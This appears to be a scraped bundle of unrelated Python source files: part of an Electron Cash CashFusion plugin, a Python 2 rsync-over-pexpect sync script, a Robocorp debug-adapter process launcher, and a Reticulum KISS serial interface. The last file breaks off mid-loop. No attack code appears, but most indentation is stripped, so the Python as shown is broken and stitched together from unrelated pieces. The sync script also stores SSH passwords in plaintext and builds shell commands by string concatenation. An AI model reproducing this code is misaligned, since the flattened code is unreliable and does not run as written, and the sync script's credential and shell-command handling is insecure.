def check_is_fuz_tx():
tx = wallet.transactions.get(txid, None)
if tx is None:
# Not found in wallet.transactions so its fuz status is as yet "unknown". Indicate this.
return None
inputs = tx.inputs()
outputs = tx.outputs()
# We expect: OP_RETURN (4) FUZ\x00
fuz_prefix = bytes((OpCodes.OP_RETURN, len(Protocol.FUSE_ID))) + Protocol.FUSE_ID
# Step 1 - does it have the proper OP_RETURN lokad prefix?
for typ, dest, amt in outputs:
if amt == 0 and typ == TYPE_SCRIPT and dest.script.startswith(fuz_prefix):
break # lokad found, proceed to Step 2 below
else:
# Nope, lokad prefix not found
return False
# Step 2 - are at least 1 of the inputs from me? (DoS prevention measure)
for inp in inputs:
inp_addr = inp.get('address', None)
if inp_addr is not None and (inp_addr in my_addresses_seen or wallet.is_mine(inp_addr)):
my_addresses_seen.add(inp_addr)
if require_depth == 0:
return True # This transaction is a CashFusion tx
# [Optional] Step 3 - Check if all ancestors up to required_depth are also fusions
if not FusionPlugin.is_fuz_coin(wallet, inp, require_depth=require_depth-1):
# require_depth specified and not all required_depth parents were CashFusion
return False
if my_addresses_seen:
# require_depth > 0: This tx + all wallet ancestors were CashFusion transactions up to require_depth
return True
# Failure -- this tx has the lokad but no inputs are "from me".
wallet.print_error(f"CashFusion: txid \"{txid}\" has a CashFusion-style OP_RETURN but none of the "
f"inputs are from this wallet. This is UNEXPECTED!")
return False
# /check_is_fuz_tx
answer = check_is_fuz_tx()
if isinstance(answer, bool):
# maybe cache the answer if it's a definitive answer True/False
if require_depth == 0:
# we got an answer for this coin's tx itself
if not answer:
cache[txid] = False
elif not cached_val:
# only set the cached val if it was missing previously, to avoid overwriting higher values
cache[txid] = 0
elif answer and (cached_val is None or cached_val < require_depth):
# indicate true up to the depth we just checked
cache[txid] = require_depth
elif not answer and isinstance(cached_val, int) and cached_val >= require_depth:
# this should never happen
wallet.print_error(f"CashFusion: WARNING txid \"{txid}\" has inconsistent state in "
f"the _cashfusion_is_fuz_txid_cache")
if answer:
# remember this address as being a "fuzed" address and cache the positive reply
cache2 = wallet._cashfusion_address_cache
assert isinstance(cache2, dict)
addr = coin.get('address', None)
if addr:
my_addresses_seen.add(addr)
for addr in my_addresses_seen:
depth = cache2.get(addr, None)
if depth is None or depth < require_depth:
cache2[addr] = require_depth
return answer
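        # Illustration of the depth parameter above: require_depth=0 only checks the
        # coin's own transaction, while require_depth=2 additionally requires the
        # wallet-owned ancestors up to two levels back to be CashFusion transactions.
        #
        #     FusionPlugin.is_fuz_coin(wallet, coin)                   # just this tx
        #     FusionPlugin.is_fuz_coin(wallet, coin, require_depth=2)  # tx + 2 ancestor levels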
@classmethod
def get_coin_fuz_count(cls, wallet, coin, *, require_depth=0):
""" Will return a fuz count for a coin. Unfused or unknown coins have count 0, coins
that appear in a fuz tx have count 1, coins whose wallet parent txs are all fuz are 2, 3, etc
        depending on how far back the fuz predicate is satisfied.
        This function only checks up to 10 ancestors deep, so the maximum return value is 10.
Precondition: wallet must be a fusion wallet. """
require_depth = min(max(require_depth, 0), MAX_LIMIT_FUSE_DEPTH - 1)
cached_ct = wallet._cashfusion_is_fuz_txid_cache.get(coin['prevout_hash'])
if isinstance(cached_ct, int) and cached_ct >= require_depth:
return cached_ct + 1
ret = 0
for i in range(cached_ct or 0, require_depth + 1, 1):
ret = i
if not cls.is_fuz_coin(wallet, coin, require_depth=i):
break
return ret
@classmethod
def is_fuz_address(cls, wallet, address, *, require_depth=0):
""" Returns True if address contains any fused UTXOs.
Optionally, specify require_depth, in which case True is returned
if any UTXOs for this address are sufficiently fused to the
specified depth.
If you want thread safety, caller must hold wallet locks.
Precondition: wallet must be a fusion wallet. """
assert isinstance(address, Address)
require_depth = max(require_depth, 0)
cache = wallet._cashfusion_address_cache
assert isinstance(cache, dict)
cached_val = cache.get(address, None)
if cached_val is not None and cached_val >= require_depth:
return True
utxos = wallet.get_addr_utxo(address)
for coin in utxos.values():
if cls.is_fuz_coin(wallet, coin, require_depth=require_depth):
if cached_val is None or cached_val < require_depth:
cache[address] = require_depth
return True
return False
@staticmethod
def on_wallet_transaction(event, *args):
""" Network object callback. Always called in the Network object's thread. """
if event == 'new_transaction':
# if this is a fusion wallet, clear the is_fuz_address() cache when new transactions arrive
# since we may have spent some utxos and so the cache needs to be invalidated
wallet = args[1]
if hasattr(wallet, '_cashfusion_address_cache'):
with wallet.lock:
wallet._cashfusion_address_cache.clear()
@daemon_command
def fusion_server_start(self, daemon, config):
# Usage:
# ./electron-cash daemon fusion_server_start <bindhost>(,<announcehost>) <port>
# ./electron-cash daemon fusion_server_start <bindhost>(,<announcehost>) <port> upnp
# ./electron-cash daemon fusion_server_start <bindhost>(,<announcehost>) <port> <donation_addr>
# ./electron-cash daemon fusion_server_start <bindhost>(,<announcehost>) <port> upnp <donation_addr>
# e.g.:
# ./electron-cash daemon fusion_server_start 0.0.0.0,myfusionserver.com 8787 upnp bitcoincash:qpxiweuqoiweweqeweqw
#
# The main server port will be bound on <bindhost>:<port>.
# Covert submissions will be bound on <bindhost>:<ephemeral_port> (the port is chosen by the OS).
# The main server will tell clients to connect to <announcehost>:<ephemeral_port>.
# The default announcehost is based on an autodetection system, which may not work for some server networking setups.
network = daemon.network
if not network:
return "error: cannot run fusion server without an SPV server connection"
def invoke(firstarg = '0.0.0.0', sport='8787', upnp_str = None, addr_str = None):
bindhost, *extrahosts = firstarg.split(',')
if len(extrahosts) > 1:
raise Exception("too many hosts")
elif len(extrahosts) == 1:
[announcehost,] = extrahosts
else:
announcehost = None
port = int(sport)
pnp = get_upnp() if upnp_str == 'upnp' else None
if not pnp and not addr_str:
# third arg may be addr_str, so swap the args
addr_str = upnp_str
upnp_str = None
addr = None
if addr_str:
assert Address.is_valid(addr_str), "Invalid donation address specified"
addr = Address.from_string(addr_str)
return self.start_fusion_server(network, bindhost, port, upnp = pnp, announcehost = announcehost, donation_address = addr)
try:
host, port = invoke(*config.get('subargs', ()))
except Exception as e:
import traceback, sys; traceback.print_exc(file=sys.stderr)
return f'error: {str(e)}'
return (host, port)
@daemon_command
def fusion_server_stop(self, daemon, config):
self.stop_fusion_server()
return 'ok'
@daemon_command
def fusion_server_status(self, daemon, config):
if not self.fusion_server:
return "fusion server not running"
return dict(poolsizes = {t: len(pool.pool) for t,pool in self.fusion_server.waiting_pools.items()})
@daemon_command
def fusion_server_fuse(self, daemon, config):
if self.fusion_server is None:
return
subargs = config.get('subargs', ())
if len(subargs) != 1:
return "expecting tier"
tier = int(subargs[0])
num_clients = self.fusion_server.start_fuse(tier)
return num_clients
|
codeSend.py
|
#coding=utf-8
import os
import json
import gevent
import sys,codecs,subprocess,pexpect,time,threading
reload( sys )
sys.setdefaultencoding('utf-8')
# Ensure the required files exist and normalize their permissions
def mkfile():
f={'./exclude.txt':666,'./config.json':666}
for i,v in f.items():
if os.path.exists(i)==False:
open(i,'a+').close()
os.system("chmod "+str(v)+" "+i)
# Load the configuration file
def openConfig(path):
try:
config = codecs.open(path,'r','utf-8');
data=config.read()
data={} if data=="" else json.loads(data)
config.close()
except Exception as e:
print e
data={}
return data
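# Illustrative note (an assumption inferred from copys() below, not part of the original
# script): config.json is expected to map a destination host to a list of
# [ssh_user, ssh_password, destination_path], with the key '/' meaning a local
# destination, e.g.:
#   {"192.168.1.10": ["deploy", "secret", "/data/www/"],
#    "/": ["", "", "/backup/www/"]}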
# Load the cached log of file modification times
def openOld(path):
try:
f_old = codecs.open(path,'r','utf-8');
data=f_old.read()
data={} if data=="" else json.loads(data)
f_old.close()
except Exception as e:
print e
data={}
return data
# Save the log cache
def saveOld(path,data):
try:
f_old = codecs.open(path,'w','utf-8')
data=json.dumps(data)
f_old.write(data)
data=True
f_old.close()
except Exception as e:
print e
data=False
return data
# Perform the copy (rsync) operation
def copys(paths,i,v):
#for i,v in dispath.items():
bakupPath=v[2]+'bakup/'
old_path=paths
disPath_one=v[2] if i=='/' else v[0]+"@"+i+":"+v[2]
# Send the files
cmd="rsync --progress -uabrz --partial --log-file=./rsync.log --force --delete --delete-excluded="+bakupPath+"/* --backup-dir="+bakupPath+" "+old_path+" "+disPath_one+" --exclude-from=./exclude.txt "
try:
child = pexpect.spawn(cmd)
if i!='/':
child.expect(['password:'])
child.sendline(v[1])
#child.interact()
while(True):
child.expect('to-check=')
datas=child.readline()
one=datas.split('/')[0]
two=datas.split('/')[1].split(')')[0]
pre=100-int(float(one) / float(two)*100)
#sys.stdout.flush()
sys.stdout.write('Source dir '+paths+' -----> '+disPath_one+' ---- syncing, progress {0}%\r'.format(pre))
if pre==100:
raise Exception("源目录"+paths+"----->"+disPath_one+"----同步完成,进度{0}%".format(100))
except Exception as e:
#print e
if type(e)==pexpect.exceptions.EOF:
#sys.stdout.flush()
sys.stdout.write("源目录"+paths+"----->"+disPath_one+"----同步完成,进度{0}%\r\n".format(100))
else:
#sys.stdout.flush()
sys.stdout.write(str(e)+"\r\n")
child.close()
# Walk files and directories, returning paths whose modification time has changed
def getMemus(path):
f_new={}
f_old=openOld('./log.txt')
f=[]
try:
for root, dirs, files in os.walk(path, topdown=False):
for name in files:
contentPath=os.path.join(root, name)
f_new.update({contentPath:os.stat(contentPath).st_mtime})
if f_old.has_key(contentPath) == False or f_old[contentPath] != os.stat(contentPath).st_mtime:
f.append(contentPath)
print saveOld('./log.txt',f_new)
except Exception as e:
print e
f=[]
return f
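# Illustrative note (hypothetical paths, not original code): log.txt stores the last-seen
# modification times as JSON, e.g. {"/data/www/index.html": 1577836800.0}; on the next
# run, paths that are new or whose mtime differs are collected into the returned list.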
if __name__ =='__main__':
if '--help' in sys.argv or '-h' in sys.argv:
print "需要一个参数,第一个参数为源目录"
elif len(sys.argv)<2:
raise Exception("需要一个参数,第一个参数为源目录")
configs=openConfig('./config.json')
testPath=sys.argv[1]
mkfile()
'''
# Asynchronous (coroutine) handling  #copys(testPath,configs)
tmp=[]
for i,v in configs.items():
tmp.append(gevent.spawn(copys,testPath,i,v))
gevent.joinall(tmp)
'''
tmp=[]
for i,v in configs.items():
t =threading.Thread(target=copys,args=(testPath,i,v,))
tmp.append(t)
for t in tmp:
t.start()
t.join()
|
launch_process.py
|
# Original work Copyright Fabio Zadrozny (EPL 1.0)
# See ThirdPartyNotices.txt in the project root for license information.
# All modifications Copyright (c) Robocorp Technologies Inc.
# All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License")
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from functools import partial
from robocorp_ls_core.robotframework_log import get_logger
import itertools
import os.path
import threading
from robocorp_ls_core.protocols import IConfig
from typing import Optional, List, Callable
from pathlib import Path
log = get_logger(__name__)
def _read_stream(stream, on_line, category):
try:
while True:
output = stream.readline()
if len(output) == 0:
log.debug("Finished reading stream: %s.\n" % (category,))
break
output = output.decode("utf-8", errors="replace")
on_line(output, category)
except:
log.exception("Error")
def _notify_on_exited_pid(on_exit, pid):
try:
from robocorp_ls_core.basic import is_process_alive
import time
log.debug("Waiting for pid to exit (_notify_on_exited_pid).")
while True:
if not is_process_alive(pid):
break
time.sleep(0.5)
log.debug("pid exited (_notify_on_exited_pid).")
on_exit()
except:
log.exception("Error")
class _DefaultConfigurationProvider(object):
def __init__(self, config: IConfig):
self.config = config
class LaunchProcess(object):
__slots__ = [
"_valid",
"_cmdline",
"_terminal",
"_popen",
"_weak_debug_adapter_comm",
"__weakref__",
"_cwd",
"_run_in_debug_mode",
"_debug_adapter_robot_target_comm",
"_launch_response",
"_next_seq",
"_track_process_pid",
"_sent_terminated",
"_env",
"_rcc_config_location",
"_on_exit_callbacks",
]
def __init__( # pylint: disable=return-in-init
self,
request,
launch_response,
debug_adapter_comm,
rcc_config_location: Optional[str],
) -> None:
"""
:param LaunchRequest request:
:param LaunchResponse launch_response:
"""
import weakref
from robocorp_ls_core.basic import as_str
from robocorp_code_debug_adapter.constants import VALID_TERMINAL_OPTIONS
from robocorp_code_debug_adapter.constants import TERMINAL_NONE
from robocorp_ls_core.robotframework_log import get_log_level
from robocorp_code.rcc import Rcc
from robocorp_ls_core.config import Config
from robocorp_ls_core import yaml_wrapper
from robocorp_ls_core.protocols import ActionResult
from robocorp_code.protocols import IRobotYamlEnvInfo
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import OutputEvent
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import OutputEventBody
self._weak_debug_adapter_comm = weakref.ref(debug_adapter_comm)
self._valid = True
self._cmdline = []
self._popen = None
self._launch_response = launch_response
self._next_seq = partial(next, itertools.count(0))
self._track_process_pid = None
self._sent_terminated = threading.Event()
self._rcc_config_location = rcc_config_location
self._on_exit_callbacks: List[Callable] = []
def mark_invalid(message):
launch_response.success = False
launch_response.message = message
self._valid = False
robot_yaml = request.arguments.kwargs.get("robot")
self._terminal = request.arguments.kwargs.get("terminal", TERMINAL_NONE)
if self._terminal != TERMINAL_NONE:
# We don't currently support the integrated terminal because we don't
# have an easy way to get the launched process pid in this way.
return mark_invalid(
f"Only 'terminal=none' is supported. Found terminal: {self._terminal}"
)
task_name = request.arguments.kwargs.get("task", "")
args = request.arguments.kwargs.get("args") or []
if not isinstance(args, list):
args = [args]
args = [str(arg) for arg in args]
env = {}
request_env = request.arguments.kwargs.get("env")
if isinstance(request_env, dict) and request_env:
env.update(request_env)
env = dict(((as_str(key), as_str(value)) for (key, value) in env.items()))
self._env = env
self._run_in_debug_mode = not request.arguments.noDebug
if self._terminal not in VALID_TERMINAL_OPTIONS:
return mark_invalid(
"Invalid terminal option: %s (must be one of: %s)"
% (self._terminal, VALID_TERMINAL_OPTIONS)
)
try:
if robot_yaml is None:
return mark_invalid("robot not provided in launch.")
if not os.path.exists(robot_yaml):
return mark_invalid("File: %s does not exist." % (robot_yaml,))
except:
log.exception("Error")
return mark_invalid("Error checking if robot (%s) exists." % (robot_yaml,))
self._cwd = os.path.dirname(robot_yaml)
try:
if self._cwd is not None:
if not os.path.exists(self._cwd):
return mark_invalid(
"cwd specified does not exist: %s" % (self._cwd,)
)
except:
log.exception("Error")
return mark_invalid("Error checking if cwd (%s) exists." % (self._cwd,))
if get_log_level() > 1:
log.debug("Run in debug mode: %s\n" % (self._run_in_debug_mode,))
try:
config = Config()
config_provider = _DefaultConfigurationProvider(config)
rcc = Rcc(config_provider=config_provider)
rcc_executable = rcc.get_rcc_location()
if not os.path.exists(rcc_executable):
return mark_invalid(f"Expected: {rcc_executable} to exist.")
except:
log.exception("Error")
return mark_invalid("Error getting rcc executable location.")
else:
task_args = []
if task_name:
task_args.append("--task")
task_args.append(task_name)
env_json_path = Path(robot_yaml).parent / "devdata" / "env.json"
exists_env_json = env_json_path.exists()
# Compute the space name
try:
with open(robot_yaml, "r") as stream:
yaml_contents = yaml_wrapper.load(stream)
except:
log.exception(f"Error loading {robot_yaml} as yaml.")
return mark_invalid(f"Error loading {robot_yaml} as yaml.")
if not isinstance(yaml_contents, dict):
return mark_invalid(f"Expected dict as root in: {robot_yaml}.")
conda_config = yaml_contents.get("condaConfigFile")
if not conda_config:
return mark_invalid(f"Could not find condaConfigFile in {robot_yaml}")
parent: Path = Path(robot_yaml).parent
conda_yaml_path = parent / conda_config
if not conda_yaml_path.exists():
return mark_invalid(f"conda.yaml does not exist in {conda_yaml_path}")
try:
conda_yaml_contents = conda_yaml_path.read_text("utf-8", "replace")
except:
log.exception(f"Error loading {conda_yaml_path} contents.")
return mark_invalid(f"Error loading {conda_yaml_path} contents.")
notify_event = threading.Event()
import time
def notify_elapsed_time():
initial_time = time.time()
notify_event.wait(5)
if notify_event.is_set():
return
output_event = OutputEvent(
OutputEventBody(
"Computing and creating environment (this can take some minutes)...\n",
category="stderr",
)
)
debug_adapter_comm.write_to_client_message(output_event)
while True:
notify_event.wait(9.33)
elapsed = time.time() - initial_time
if not notify_event.is_set():
output_event = OutputEvent(
OutputEventBody(
"Elapsed: %.1fs\n" % (elapsed,), category="stderr"
)
)
debug_adapter_comm.write_to_client_message(output_event)
t = threading.Thread(target=notify_elapsed_time)
t.daemon = True
t.start()
try:
robot_yaml_env_info: ActionResult[
IRobotYamlEnvInfo
] = rcc.get_robot_yaml_env_info(
Path(robot_yaml),
conda_yaml_path,
conda_yaml_contents,
env_json_path if exists_env_json else None,
)
finally:
notify_event.set()
if not robot_yaml_env_info.success:
return mark_invalid(robot_yaml_env_info.message)
robot_yaml_env_info_result: Optional[
IRobotYamlEnvInfo
] = robot_yaml_env_info.result
if not robot_yaml_env_info_result:
return mark_invalid(
"Internal error: robot_yaml_env_info_result not available."
)
space_name = robot_yaml_env_info_result.space_info.space_name
cmdline = (
[
rcc_executable,
"task",
"run",
"--robot",
robot_yaml,
"--space",
space_name,
]
+ task_args
+ args
)
if self._rcc_config_location:
cmdline.append("--config")
cmdline.append(self._rcc_config_location)
if exists_env_json:
use_path: str = str(env_json_path)
for var_name in self.MANAGED_ENV_VARIABLES:
if var_name in self._env:
try:
use_path = self._collect_env_json_without_managed_vars(
env_json_path
)
except:
log.exception("Error collecting managed env json.")
break
cmdline.append("-e")
cmdline.append(use_path)
cmdline.append("--controller")
cmdline.append("RobocorpCode")
self._cmdline = cmdline
MANAGED_ENV_VARIABLES = [
"RPA_OUTPUT_WORKITEM_PATH",
"RPA_INPUT_WORKITEM_PATH",
"RPA_WORKITEMS_ADAPTER",
]
def _collect_env_json_without_managed_vars(self, env_json_path: Path) -> str:
"""
If the existing env.json has some managed environment variable, a new
env.json without those variables is created and returned to be used for
the RCC launch (otherwise the original is returned).
"""
import json
changed = False
current_env_contents = json.loads(env_json_path.read_text("utf-8"))
if not isinstance(current_env_contents, dict):
raise RuntimeError(f"Expected {env_json_path} contents to be a json dict.")
# Ok, let's update the file if there are work-item related
# variables in the env.json.
from tempfile import NamedTemporaryFile
temp_file = NamedTemporaryFile(delete=False)
# Environment variables managed by the extension should
# be removed from the base env.json.
for env_name in self.MANAGED_ENV_VARIABLES:
if env_name in current_env_contents and env_name in self._env:
changed = True
del current_env_contents[env_name]
if changed:
temp_file.write(json.dumps(current_env_contents).encode("utf-8"))
temp_file.close()
def on_exit():
try:
os.remove(temp_file.name)
except:
# If it was already removed, that's ok.
pass
self._on_exit_callbacks.append(on_exit)
return str(temp_file.name)
return str(env_json_path)
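# Illustrative note (hypothetical values, not original code): given a devdata/env.json of
#   {"RPA_INPUT_WORKITEM_PATH": "work-items/in.json", "MY_SETTING": "1"}
# and a launch whose env also sets RPA_INPUT_WORKITEM_PATH, the helper above writes a
# temporary file containing only {"MY_SETTING": "1"} and hands that to RCC, so the
# extension-managed work-item variables take precedence over the values baked into
# devdata/env.json.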
@property
def valid(self):
return self._valid
@property
def run_in_debug_mode(self):
return self._run_in_debug_mode
def notify_exit(self):
if self._sent_terminated.is_set():
return
try:
self._sent_terminated.set()
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import (
TerminatedEvent,
)
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import (
TerminatedEventBody,
)
debug_adapter_comm = self._weak_debug_adapter_comm()
if debug_adapter_comm is not None:
restart = False
terminated_event = TerminatedEvent(
body=TerminatedEventBody(restart=restart)
)
debug_adapter_comm.write_to_client_message(terminated_event)
finally:
for c in self._on_exit_callbacks:
try:
c()
except:
log.exception("Error on exit callback.")
def launch(self):
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import (
RunInTerminalRequest,
)
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import (
RunInTerminalRequestArguments,
)
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import OutputEvent
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import OutputEventBody
from robocorp_code_debug_adapter.constants import TERMINAL_NONE
from robocorp_ls_core.robotframework_log import get_log_level
from robocorp_code_debug_adapter.constants import TERMINAL_EXTERNAL
from robocorp_code_debug_adapter.constants import TERMINAL_INTEGRATED
# Note: using a weak-reference so that callbacks don't keep it alive
weak_debug_adapter_comm = self._weak_debug_adapter_comm
terminal = self._terminal
if not weak_debug_adapter_comm().supports_run_in_terminal:
# If the client doesn't support running in the terminal we fallback to using the debug console.
terminal = TERMINAL_NONE
threads = []
if terminal == TERMINAL_NONE:
import subprocess
if get_log_level() > 1:
log.debug(
"Launching in debug console (not in terminal): %s"
% (self._cmdline,)
)
env = os.environ.copy()
env.update(self._env)
self._popen = subprocess.Popen(
self._cmdline,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
stdin=subprocess.PIPE,
cwd=self._cwd,
env=env,
)
def on_output(output, category):
debug_adapter_comm = weak_debug_adapter_comm()
if debug_adapter_comm is not None:
output_event = OutputEvent(
OutputEventBody(output, category=category)
)
debug_adapter_comm.write_to_client_message(output_event)
stdout_stream_thread = threading.Thread(
target=_read_stream,
args=(self._popen.stdout, on_output, "stdout"),
name="Read stdout",
)
stderr_stream_thread = threading.Thread(
target=_read_stream,
args=(self._popen.stderr, on_output, "stderr"),
name="Read stderr",
)
threads.append(stdout_stream_thread)
threads.append(stderr_stream_thread)
self._track_process_pid = self._popen.pid
elif terminal in (TERMINAL_INTEGRATED, TERMINAL_EXTERNAL):
kind = terminal
if get_log_level() > 1:
log.debug('Launching in "%s" terminal: %s' % (kind, self._cmdline))
debug_adapter_comm = weak_debug_adapter_comm()
cmdline = self._cmdline
if debug_adapter_comm is not None:
debug_adapter_comm.write_to_client_message(
RunInTerminalRequest(
RunInTerminalRequestArguments(
cwd=self._cwd, args=cmdline, kind=kind, env=self._env
)
)
)
# TODO: Get pid when running with terminal (get from response).
if self._track_process_pid is None:
log.debug("Unable to track if pid is alive (pid unavailable).")
else:
threads.append(
threading.Thread(
target=_notify_on_exited_pid,
args=(self.notify_exit, self._track_process_pid),
name="Track PID alive",
)
)
for t in threads:
t.daemon = True
t.start()
def disconnect(self, disconnect_request):
from robocorp_ls_core.basic import kill_process_and_subprocesses
if self._popen is not None:
if self._popen.returncode is None:
kill_process_and_subprocesses(self._popen.pid)
else:
kill_process_and_subprocesses(self._track_process_pid)
def send_to_stdin(self, expression):
popen = self._popen
if popen is not None:
try:
log.debug("Sending: %s to stdin." % (expression,))
def write_to_stdin(popen, expression):
popen.stdin.write(expression)
if not expression.endswith("\r") and not expression.endswith("\n"):
popen.stdin.write("\n")
popen.stdin.flush()
# Do it in a thread (in theory the OS could have that filled up and we would never complete
# trying to write -- although probably a bit far fetched, let's code as if that could actually happen).
t = threading.Thread(
target=write_to_stdin,
args=(popen, expression),
name="Send to STDIN",
)
t.daemon = True
t.start()
except:
log.exception("Error writing: >>%s<< to stdin." % (expression,))
|
KISSInterface.py
|
from .Interface import Interface
from time import sleep
import sys
import serial
import threading
import time
import RNS
class KISS():
FEND = 0xC0
FESC = 0xDB
TFEND = 0xDC
TFESC = 0xDD
CMD_UNKNOWN = 0xFE
CMD_DATA = 0x00
CMD_TXDELAY = 0x01
CMD_P = 0x02
CMD_SLOTTIME = 0x03
CMD_TXTAIL = 0x04
CMD_FULLDUPLEX = 0x05
CMD_SETHARDWARE = 0x06
CMD_READY = 0x0F
CMD_RETURN = 0xFF
@staticmethod
def escape(data):
data = data.replace(bytes([0xdb]), bytes([0xdb, 0xdd]))
data = data.replace(bytes([0xc0]), bytes([0xdb, 0xdc]))
return data
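# Illustrative note (a sketch, not part of the original interface code): a KISS data frame
# is FEND, the command byte, the escaped payload, FEND. With the constants above, a
# payload of b"\xc0\x01" escapes to b"\xdb\xdc\x01" and frames as:
#   bytes([KISS.FEND, KISS.CMD_DATA]) + KISS.escape(b"\xc0\x01") + bytes([KISS.FEND])
#   # -> b"\xc0\x00\xdb\xdc\x01\xc0"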
class KISSInterface(Interface):
MAX_CHUNK = 32768
owner = None
port = None
speed = None
databits = None
parity = None
stopbits = None
serial = None
def __init__(self, owner, name, port, speed, databits, parity, stopbits, preamble, txtail, persistence, slottime, flow_control, beacon_interval, beacon_data):
self.rxb = 0
self.txb = 0
if beacon_data == None:
beacon_data = ""
self.serial = None
self.owner = owner
self.name = name
self.port = port
self.speed = speed
self.databits = databits
self.parity = serial.PARITY_NONE
self.stopbits = stopbits
self.timeout = 100
self.online = False
self.beacon_i = beacon_interval
self.beacon_d = beacon_data.encode("utf-8")
self.first_tx = None
self.packet_queue = []
self.flow_control = flow_control
self.interface_ready = False
self.flow_control_timeout = 5
self.flow_control_locked = time.time()
self.preamble = preamble if preamble != None else 350;
self.txtail = txtail if txtail != None else 20;
self.persistence = persistence if persistence != None else 64;
self.slottime = slottime if slottime != None else 20;
if parity.lower() == "e" or parity.lower() == "even":
self.parity = serial.PARITY_EVEN
if parity.lower() == "o" or parity.lower() == "odd":
self.parity = serial.PARITY_ODD
try:
RNS.log("Opening serial port "+self.port+"...")
self.serial = serial.Serial(
port = self.port,
baudrate = self.speed,
bytesize = self.databits,
parity = self.parity,
stopbits = self.stopbits,
xonxoff = False,
rtscts = False,
timeout = 0,
inter_byte_timeout = None,
write_timeout = None,
dsrdtr = False,
)
except Exception as e:
RNS.log("Could not open serial port "+self.port, RNS.LOG_ERROR)
raise e
if self.serial.is_open:
# Allow time for interface to initialise before config
sleep(2.0)
thread = threading.Thread(target=self.readLoop)
thread.setDaemon(True)
thread.start()
self.online = True
RNS.log("Serial port "+self.port+" is now open")
RNS.log("Configuring KISS interface parameters...")
self.setPreamble(self.preamble)
self.setTxTail(self.txtail)
self.setPersistence(self.persistence)
self.setSlotTime(self.slottime)
self.setFlowControl(self.flow_control)
self.interface_ready = True
RNS.log("KISS interface configured")
else:
raise IOError("Could not open serial port")
def setPreamble(self, preamble):
preamble_ms = preamble
preamble = int(preamble_ms / 10)
if preamble < 0:
preamble = 0
if preamble > 255:
preamble = 255
kiss_command = bytes([KISS.FEND])+bytes([KISS.CMD_TXDELAY])+bytes([preamble])+bytes([KISS.FEND])
written = self.serial.write(kiss_command)
if written != len(kiss_command):
raise IOError("Could not configure KISS interface preamble to "+str(preamble_ms)+" (command value "+str(preamble)+")")
def setTxTail(self, txtail):
txtail_ms = txtail
txtail = int(txtail_ms / 10)
if txtail < 0:
txtail = 0
if txtail > 255:
txtail = 255
kiss_command = bytes([KISS.FEND])+bytes([KISS.CMD_TXTAIL])+bytes([txtail])+bytes([KISS.FEND])
written = self.serial.write(kiss_command)
if written != len(kiss_command):
raise IOError("Could not configure KISS interface TX tail to "+str(txtail_ms)+" (command value "+str(txtail)+")")
def setPersistence(self, persistence):
if persistence < 0:
persistence = 0
if persistence > 255:
persistence = 255
kiss_command = bytes([KISS.FEND])+bytes([KISS.CMD_P])+bytes([persistence])+bytes([KISS.FEND])
written = self.serial.write(kiss_command)
if written != len(kiss_command):
raise IOError("Could not configure KISS interface persistence to "+str(persistence))
def setSlotTime(self, slottime):
slottime_ms = slottime
slottime = int(slottime_ms / 10)
if slottime < 0:
slottime = 0
if slottime > 255:
slottime = 255
kiss_command = bytes([KISS.FEND])+bytes([KISS.CMD_SLOTTIME])+bytes([slottime])+bytes([KISS.FEND])
written = self.serial.write(kiss_command)
if written != len(kiss_command):
raise IOError("Could not configure KISS interface slot time to "+str(slottime_ms)+" (command value "+str(slottime)+")")
def setFlowControl(self, flow_control):
kiss_command = bytes([KISS.FEND])+bytes([KISS.CMD_READY])+bytes([0x01])+bytes([KISS.FEND])
written = self.serial.write(kiss_command)
if written != len(kiss_command):
if (flow_control):
raise IOError("Could not enable KISS interface flow control")
else:
raise IOError("Could not enable KISS interface flow control")
def processIncoming(self, data):
self.rxb += len(data)
self.owner.inbound(data, self)
def processOutgoing(self,data):
datalen = len(data)
if self.online:
if self.interface_ready:
if self.flow_control:
self.interface_ready = False
self.flow_control_locked = time.time()
data = data.replace(bytes([0xdb]), bytes([0xdb])+bytes([0xdd]))
data = data.replace(bytes([0xc0]), bytes([0xdb])+bytes([0xdc]))
frame = bytes([KISS.FEND])+bytes([0x00])+data+bytes([KISS.FEND])
written = self.serial.write(frame)
self.txb += datalen
if data == self.beacon_d:
self.first_tx = None
else:
if self.first_tx == None:
self.first_tx = time.time()
if written != len(frame):
raise IOError("Serial interface only wrote "+str(written)+" bytes of "+str(len(data)))
else:
self.queue(data)
def queue(self, data):
self.packet_queue.append(data)
def process_queue(self):
if len(self.packet_queue) > 0:
data = self.packet_queue.pop(0)
self.interface_ready = True
self.processOutgoing(data)
elif len(self.packet_queue) == 0:
self.interface_ready = True
def readLoop(self):
try:
in_frame = False
escape = False
command = KISS.CMD_UNKNOWN
data_buffer = b""
last_read_ms = int(time.time()*1000)
while self.serial.is_open:
if self.serial.in_waiting:
byte = ord(self.serial.read(1))
last_read_ms = int(time.time()*1000)
if (in_frame and byte == KISS.FEND and command == KISS.CMD_DATA):
in_frame = False
self.processIncoming(data_buffer)
elif (byte == KISS.FEND):
in_frame = True
command = KISS.CMD_UNKNOWN
data_buffer = b""
elif (in_frame and len(data_buffer) < RNS.Reticulum.MTU):
if (len(data_buffer) == 0 and command == KISS.CMD_UNKNOWN):
# We only support one HDLC port for now, so
# strip off the port nibble
byte = byte & 0x0F
command = byte
elif (command == KISS.CMD_DATA):
if (byte == KISS.FESC):
escape = True
else:
if (escape):
if (byte == KISS.TFEND):
byte = KISS.FEND
if (byte == KISS.TFESC):
byte = KISS.FESC
escape = False
data_buffer = data_buffer+bytes([byte])
elif (command == KISS.CMD_READY):
self.process_queue()
else:
time_since_last = int(time.time()*1000) - last_read_ms
if len(data_buffer) > 0 and time_since_last > self.timeout:
data_buffer = b""
in_frame = False
command = KISS.CMD_UNKNOWN
escape = False
sleep(0.05)
if self.flow_control:
if not self.interface_ready:
if time.time() > self.flow_control_locked + self.flow_control_timeout:
